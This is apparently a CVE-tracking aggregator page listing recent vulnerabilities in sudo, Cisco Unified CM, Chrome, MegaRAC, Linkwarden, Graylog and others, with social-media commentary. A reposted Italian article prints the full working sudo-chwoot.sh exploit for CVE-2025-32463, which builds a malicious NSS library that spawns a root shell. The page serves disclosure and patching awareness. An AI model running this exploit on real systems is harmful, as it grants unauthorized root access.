24h | 7d | 30d

Overview

  • Sudo project
  • Sudo

30 Jun 2025
Published
01 Jul 2025
Updated

CVSS v3.1
CRITICAL (9.3)
EPSS
0.01%

KEV

Description

Sudo before 1.9.17p1 allows local users to obtain root access because /etc/nsswitch.conf from a user-controlled directory is used with the --chroot option.

Statistics

  • 7 Posts
  • 48 Interactions

Fediverse

Profile picture

Important for #OpenBSD users is the comment in the ports-update commit message. #CVE-2025-32463 #SUDO

  • 5
  • 0
  • 20 hours ago
Profile picture

„Sudo before 1.9.17p1 allows local users to obtain root access because /etc/nsswitch.conf from a user-controlled directory is used with the --chroot option.“
euvd.enisa.europa.eu/vulnerabi

You should update sudo.

You also might want to think about using an alternative to sudo, considering its high level of complexity in code and configuration.
„doas“ is much leaner in both code and configuration, which helps to avoid certain problems.

github.com/slicer69/doas/
#Unix #Security #CVE_2025_32463

  • 1
  • 1
  • 14 hours ago
Profile picture

Local Privilege Escalation to Root via Sudo Chroot in Linux github.com/kh4sh3i/CVE-2025-32

  • 1
  • 1
  • 11 hours ago
Profile picture

Another one to keep in mind for future CTF challenges:

"CVE-2025-32463: sudo local privilege escalation via chroot option"

An attacker can leverage sudo's -R (--chroot) option to run
arbitrary commands as root, even if they are not listed in the sudoers file.

Sudo versions 1.9.14 to 1.9.17 affected.

openwall.com/lists/oss-securit

  • 0
  • 1
  • 19 hours ago
Profile picture

engang for hundre år siden, da jeg først begynte med #Linux, så var liksom ikke #sudo en greie. Og så ble det det, og en del av oss himlet litt med øynene av "sudo su" og sånt, men så ble det etter hvert ganske vanlig.

Men mellom det @pid_eins har skravlet om rundt #run0, og @trifectatech sin #sudors, så er det kanskje på tide å gå tilbake til å ikke ha vanilla sudo på maskina igjen?

stratascale.com/vulnerability-

  • 0
  • 1
  • 13 hours ago
Profile picture

Linux Pwned! Privilege Escalation su SUDO in 5 secondi. HackerHood testa l’exploit CVE-2025-32463

Nella giornata di ieri, Red Hot Cyber ha pubblicato un approfondimento su una grave vulnerabilità scoperta in SUDO (CVE-2025-32463), che consente l’escalation dei privilegi a root in ambienti Linux sfruttando un abuso della funzione chroot.

L’exploit, reso pubblico da Stratascale, dimostra come un utente non privilegiato possa ottenere l’accesso root tramite una precisa catena di operazioni che sfruttano un comportamento errato nella gestione dei processi figli in ambienti chroot.

Test sul campo: la parola a Manuel Roccon del gruppo HackerHood


Manuel Roccon, ricercatore del gruppo HackerHood di Red Hot Cyber, ha voluto mettere le mani sull’exploit per verificarne concretamente la portata e valutarne la replicabilità in ambienti reali. “Non potevo resistere alla tentazione di provarlo in un ambiente isolato. È impressionante quanto sia diretto e pulito il meccanismo, una volta soddisfatti i requisiti richiesti dal PoC”, afferma Manuel.

Il team ha quindi testato il Proof of Concept pubblicato da Stratascale Exploit CVE-2025-32463 – sudo chroot. Il risultato? Privilege escalation ottenuta con successo.

youtube.com/embed/-GxiqS-f7Yg?…

Dettagli dell’exploit


L’exploit sfrutta una condizione in cui sudo esegue un comando in un ambiente chroot, lasciando tuttavia aperte alcune possibilità al processo figlio di uscire dal chroot e di manipolare lo spazio dei nomi dei processi (namespace) fino ad ottenere accesso completo come utente root.

L’exploit CVE-2025-32463, dimostrato nel PoC sudo-chwoot.sh di Rich Mirch (Stratascale CRU), sfrutta una vulnerabilità in sudo che consente a un utente non privilegiato di ottenere privilegi di root quando sudo viene eseguito con l’opzione -R (che specifica un chroot directory). Lo script crea un ambiente temporaneo (/tmp/sudowoot.stage.*), compila una libreria condivisa malevola (libnss_/woot1337.so.2) contenente una funzione constructor che eleva i privilegi e apre una shell root (/bin/bash), e forza sudo a caricarla come libreria NSS nel contesto chroot.

La tecnica sfrutta un errore logico nella gestione della libreria NSS in ambienti chroot, dove sudo carica dinamicamente librerie esterne senza isolarle correttamente. Lo script imposta infatti una finta configurazione nsswitch.conf per forzare l’uso della propria libreria, posizionandola all’interno della directory woot/, che funge da root virtuale per il chroot. Quando sudo -R woot woot viene eseguito, la libreria woot1337.so.2 viene caricata, e il codice eseguito automaticamente grazie all’attributo __attribute__((constructor)), ottenendo così l’escalation dei privilegi.

I requisiti fondamentali per sfruttare con successo questa vulnerabilità includono:

  • L’abilitazione dell’uso di chroot tramite sudo.
  • L’assenza di alcune restrizioni nei profili di sicurezza (come AppArmor o SELinux).
  • Una configurazione permissiva di sudoers.

Di seguito le semplici righe

#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > woot1337.c
#include

__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}

Conclusioni


Il test effettuato da Manuel Roccon dimostra quanto questa vulnerabilità non sia solo teorica, ma pienamente sfruttabile in ambienti di produzione non correttamente protetti. In scenari DevOps o containerizzati, dove l’uso di sudo e chroot è comune, i rischi aumentano considerevolmente.

Red Hot Cyber e il gruppo HackerHood raccomandano l’immediato aggiornamento di SUDO all’ultima versione disponibile, e la revisione delle configurazioni di sicurezza relative a chroot e permessi sudoers.

La sicurezza parte dalla consapevolezza. Continuate a seguirci per analisi tecniche, PoC testati e segnalazioni aggiornate.

L'articolo Linux Pwned! Privilege Escalation su SUDO in 5 secondi. HackerHood testa l’exploit CVE-2025-32463 proviene da il blog della sicurezza informatica.

  • 0
  • 0
  • 16 hours ago

Overview

  • Cisco
  • Cisco Unified Communications Manager

02 Jul 2025
Published
02 Jul 2025
Updated

CVSS v3.1
CRITICAL (10.0)
EPSS
Pending

KEV

Description

A vulnerability in Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) could allow an unauthenticated, remote attacker to log in to an affected device using the root account, which has default, static credentials that cannot be changed or deleted. This vulnerability is due to the presence of static user credentials for the root account that are reserved for use during development. An attacker could exploit this vulnerability by using the account to log in to an affected system. A successful exploit could allow the attacker to log in to the affected system and execute arbitrary commands as the root user.

Statistics

  • 3 Posts
  • 100 Interactions

Fediverse

Profile picture

Are you fucking kidding me Cisco? Again?

sec.cloudapps.cisco.com/securi

sev:CRIT 10.0 🥳

A vulnerability in Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) could allow an unauthenticated, remote attacker to log in to an affected device using the root account, which has default, static credentials that cannot be changed or deleted.

nvd.nist.gov/vuln/detail/CVE-2

  • 47
  • 46
  • 10 hours ago
Profile picture

A note on the security advisory for CVE-2025-20309 in Cisco Unified Communications Manager which covers hard coded credentials - as I understand it this only impacts a special version of the product that users would have to contact TAC to get. If that is a correct understanding then I would expect this to limit the likelihood that organizations are running the impacted versions.

Quoting from the advisory:

This vulnerability affects Cisco Unified CM and Unified CM SME Engineering Special (ES) releases 15.0.1.13010-1 through 15.0.1.13017-1, regardless of device configuration.

Note: ES releases are limited fix releases that are distributed only by the Cisco Technical Assistance Center (TAC).

Reference: sec.cloudapps.cisco.com/securi

  • 3
  • 4
  • 7 hours ago
Profile picture

@_newick NIST hasn't published it then. It's also available here: cve.org/CVERecord?id=CVE-2025-

  • 0
  • 0
  • 10 hours ago

Overview

  • Google
  • Chrome

30 Jun 2025
Published
02 Jul 2025
Updated

CVSS
Pending
EPSS
0.03%

Description

Type confusion in V8 in Google Chrome prior to 138.0.7204.96 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: High)

Statistics

  • 2 Posts
  • 1 Interaction

Fediverse

Profile picture

Microsoft Edge 138.0.3351.65 korrigiert die schon ausgenutzte Sicherheitslücke (CVE-2025-6554)

deskmodder.de/blog/2025/07/02/

  • 1
  • 0
  • 22 hours ago

Overview

  • AMI
  • MegaRAC-SPx

11 Mar 2025
Published
27 Jun 2025
Updated

CVSS v4.0
CRITICAL (10.0)
EPSS
9.47%

Description

AMI’s SPx contains a vulnerability in the BMC where an Attacker may bypass authentication remotely through the Redfish Host Interface. A successful exploitation of this vulnerability may lead to a loss of confidentiality, integrity, and/or availability.

Statistics

  • 2 Posts
  • 1 Interaction

Fediverse

Profile picture

Cette faille critique dans MegaRAC menace des milliers de serveurs, y compris ceux éteints ! it-connect.fr/faille-ami-megar #ActuCybersécurité #Cybersécurité #Vulnérabilité

  • 0
  • 0
  • 11 hours ago
Profile picture

Eclypsium has released two Nuclei templates to detect BMC vulnerabilities: CVE-2024-54085 (recently added to the CISA KEV) and CVE-2023-34329 (very similar). Please use them and send us feedback! Happy patching!

Blog post: eclypsium.com/blog/eclypsium-r

  • 0
  • 1
  • 6 hours ago

Overview

  • Sudo project
  • Sudo

30 Jun 2025
Published
01 Jul 2025
Updated

CVSS v3.1
LOW (2.8)
EPSS
0.02%

KEV

Description

Sudo before 1.9.17p1, when used with a sudoers file that specifies a host that is neither the current host nor ALL, allows listed users to execute commands on unintended machines.

Statistics

  • 1 Post
  • 37 Interactions

Overview

  • linkwarden
  • linkwarden

02 Jul 2025
Published
02 Jul 2025
Updated

CVSS v4.0
HIGH (8.7)
EPSS
Pending

KEV

Description

Linkwarden is a self-hosted, open-source collaborative bookmark manager to collect, organize and archive webpages. In version 2.10.2, the server accepts links of format file:///etc/passwd and doesn't do any validation before sending them to parsers and playwright, this can result in leak of other user's links (and in some cases it might be possible to leak environment secrets). This issue has been patched in version 2.10.3 which has not been made public at time of publication.

Statistics

  • 1 Post
  • 3 Interactions

Fediverse

Profile picture

Hilarious LFI in Linkwarden.

github.com/linkwarden/linkward

sev:HIGH 8.7 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Linkwarden is a self-hosted, open-source collaborative bookmark manager to collect, organize and archive webpages. In version 2.10.2, the server accepts links of format file:///etc/passwd and doesn't do any validation before sending them to parsers and playwright, this can result in leak of other user's links (and in some cases it might be possible to leak environment secrets). This issue has been patched in version 2.10.3 which has not been made public at time of publication.

nvd.nist.gov/vuln/detail/CVE-2

  • 2
  • 1
  • 12 hours ago

Overview

  • scripteo
  • Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager

02 Jul 2025
Published
02 Jul 2025
Updated

CVSS v3.1
CRITICAL (9.8)
EPSS
0.15%

KEV

Description

The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to Local File Inclusion which leads to Remote Code Execution in all versions up to, and including, 4.89. This is due to the presence of a SQL Injection vulnerability and Local File Inclusion vulnerability that can be chained with an image upload. This makes it possible for unauthenticated attackers to execute code on the server upload image files on the server than can be fetched via a SQL injection vulnerability, and ultimately executed as PHP code through the local file inclusion vulnerability.

Statistics

  • 1 Post
  • 1 Interaction

Fediverse

Profile picture

🚨 CRITICAL: CVE-2025-4689 in Ads Pro Plugin (WordPress) enables unauth RCE via chained SQLi+LFI. All versions up to 4.89 affected. Disable plugin now & monitor for suspicious activity. radar.offseq.com/threat/cve-20

  • 1
  • 0
  • 21 hours ago

Overview

  • owasp-modsecurity
  • ModSecurity

02 Jul 2025
Published
02 Jul 2025
Updated

CVSS v3.1
MEDIUM (6.5)
EPSS
Pending

KEV

Description

ModSecurity is an open source, cross platform web application firewall (WAF) engine for Apache, IIS and Nginx. In versions 2.9.8 to before 2.9.11, an empty XML tag can cause a segmentation fault. If SecParseXmlIntoArgs is set to On or OnlyArgs, and the request type is application/xml, and at least one XML tag is empty (eg <foo></foo>), then a segmentation fault occurs. This issue has been patched in version 2.9.11. A workaround involves setting SecParseXmlIntoArgs to Off.

Statistics

  • 1 Post
  • 2 Interactions

Fediverse

Profile picture

Whoopsie. DoS in ModSecurity.

github.com/owasp-modsecurity/M

sev:MED 6.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

ModSecurity is an open source, cross platform web application firewall (WAF) engine for Apache, IIS and Nginx. In versions 2.9.8 to before 2.9.11, an empty XML tag can cause a segmentation fault. If SecParseXmlIntoArgs is set to On or OnlyArgs, and the request type is application/xml, and at least one XML tag is empty (eg ), then a segmentation fault occurs. This issue has been patched in version 2.9.11. A workaround involves setting SecParseXmlIntoArgs to Off.

nvd.nist.gov/vuln/detail/CVE-2

  • 0
  • 2
  • 11 hours ago

Overview

  • Graylog2
  • graylog2-server

02 Jul 2025
Published
02 Jul 2025
Updated

CVSS v4.0
HIGH (8.8)
EPSS
Pending

KEV

Description

Graylog is a free and open log management platform. In versions 6.2.0 to before 6.2.4 and 6.3.0-alpha.1 to before 6.3.0-rc.2, Graylog users can gain elevated privileges by creating and using API tokens for the local Administrator or any other user for whom the malicious user knows the ID. For the attack to succeed, the attacker needs a user account in Graylog. They can then proceed to issue hand-crafted requests to the Graylog REST API and exploit a weak permission check for token creation. This issue has been patched in versions 6.2.4 and 6.3.0-rc.2. A workaround involves disabling the respective configuration found in System > Configuration > Users > "Allow users to create personal access tokens".

Statistics

  • 1 Post
  • 2 Interactions

Fediverse

Profile picture

PrivEsc in Graylog.

github.com/Graylog2/graylog2-s

sev:HIGH 8.8 - CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Graylog is a free and open log management platform. In versions 6.2.0 to before 6.2.4 and 6.3.0-alpha.1 to before 6.3.0-rc.2, Graylog users can gain elevated privileges by creating and using API tokens for the local Administrator or any other user for whom the malicious user knows the ID. For the attack to succeed, the attacker needs a user account in Graylog. They can then proceed to issue hand-crafted requests to the Graylog REST API and exploit a weak permission check for token creation. This issue has been patched in versions 6.2.4 and 6.3.0-rc.2. A workaround involves disabling the respective configuration found in System > Configuration > Users > "Allow users to create personal access tokens".

nvd.nist.gov/vuln/detail/CVE-2

  • 0
  • 2
  • 12 hours ago

Overview

  • Pending

22 Jul 2010
Published
07 Aug 2024
Updated

CVSS
Pending
EPSS
0.08%

KEV

Description

Siemens Simatic WinCC and PCS 7 SCADA system uses a hard-coded password, which allows local users to access a back-end database and gain privileges, as demonstrated in the wild in July 2010 by the Stuxnet worm, a different vulnerability than CVE-2010-2568.

Statistics

  • 1 Post
  • 1 Interaction

Fediverse

Profile picture

Other options:
Exfiltrator
Malicious Payload
CVE-2010-2772

  • 0
  • 1
  • 12 hours ago
Showing 1 to 10 of 40 CVEs